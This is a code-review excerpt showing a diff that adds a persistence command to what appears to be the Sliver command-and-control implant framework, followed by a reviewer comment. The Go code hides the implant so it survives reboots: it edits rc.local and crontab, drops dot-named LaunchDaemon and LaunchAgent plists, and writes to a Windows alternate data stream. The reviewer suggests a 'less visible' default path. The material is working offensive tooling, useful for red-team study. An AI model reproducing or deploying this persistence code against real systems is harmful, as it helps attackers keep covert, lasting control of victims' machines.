client/command/persist.go

```diff
@@ -0,0 +1,411 @@
+				})
+				if err != nil {
+					fmt.Printf(Warn+"Error: %v\n", err)
+					return
+				}
+
+				rc := strings.Split(string(resp.Data), "\n")
+				leline, rc := rc[len(rc)-1], rc[:len(rc)-1]
+				rc = rc[:len(rc)-1]
+				rc = append(rc, leline)
+
+				_, err = rpc.Upload(context.Background(), &sliverpb.UploadReq{
+					Path:    "/etc/rc.local",
+					Encoder: "gzip",
+					Data:    new(encoders.Gzip).Encode([]byte(strings.Join(rc[:], "\n"))),
+					Request: ActiveSession.Request(ctx),
+				})
+				if err != nil {
+					fmt.Printf(Warn+"Error: %v\n", err)
+					return
+				}
+			} else {
+				_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+					Path:    "/bin/sh",
+					Args:    []string{"-c", "\"crontab -r\""},
+					Output:  false,
+					Request: ActiveSession.Request(ctx),
+				})
+				if err != nil {
+					fmt.Printf(Warn+"Error: %v\n", err)
+					return
+				}
+			}
+		case "darwin":
+			_, err := rpc.Rm(context.Background(), &sliverpb.RmReq{
+				Path:      "/var/tmp/.DS_Store",
+				Recursive: false,
+				Force:     true,
+				Request:   ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+
+			if session.Username == "root" {
+				path = "/Library/LaunchDaemons/." + sliver + ".plist"
+				/*
+					_, err = rpc.Rm(context.Background(), &sliverpb.RmReq{
+						Path:      "/etc/emond.d/rules/" + sliver + ".plist",
+						Recursive: false,
+						Force:     true,
+						Request:   ActiveSession.Request(ctx),
+					})
+					if err != nil {
+						fmt.Printf(Warn+"Error: %v\n", err)
+						return
+					}
+				*/
+			} else {
+				path = "/Users/" + session.Username + "/Library/LaunchAgents/." + sliver + ".plist"
+			}
+			_, err = rpc.Execute(context.Background(), &sliverpb.ExecuteReq{
+				Path:    "/bin/launchctl",
+				Args:    []string{"unload", path},
+				Output:  false,
+				Request: ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+
+			_, err = rpc.Rm(context.Background(), &sliverpb.RmReq{
+				Path:      path,
+				Recursive: false,
+				Force:     true,
+				Request:   ActiveSession.Request(ctx),
+			})
+			if err != nil {
+				fmt.Printf(Warn+"Error: %v\n", err)
+				return
+			}
+		}
+		fmt.Println(Info + "Done!")
+		return
+	}
+
+	if !isUserAnAdult() {
+		return
+	}
+
+	ctrl := make(chan bool)
+	go spin.Until("Regenerating sliver, please wait ...", ctrl)
+	stageFile, err := rpc.Regenerate(context.Background(), &clientpb.RegenerateReq{
+		ImplantName: sliver,
+	})
+	ctrl <- true
+	<-ctrl
+
+	if err != nil {
+		fmt.Printf(Warn+"Error: %v", err)
+		return
+	}
+
+	fmt.Println(Info + "Sliver regenerated. (Pretty much Indestructible)")
+	exe := string(stageFile.GetFile().GetData())
+
+	// Upload file
+	switch stageOS {
+	case "windows":
+		// %HOMEPATH% Variable expansion would make this more reliable
+		if session.Username == "NT AUTHORITY\\SYSTEM" {
+			path = "C:\\:" + sliver + ".exe"
```

Comment:
We should:
- make this configurable
- default to somewhere a bit less "visible", like `C:\Windows\Temp` (although I'm not sure whether `C:\Windows\Temp` content gets wiped out on reboot or not).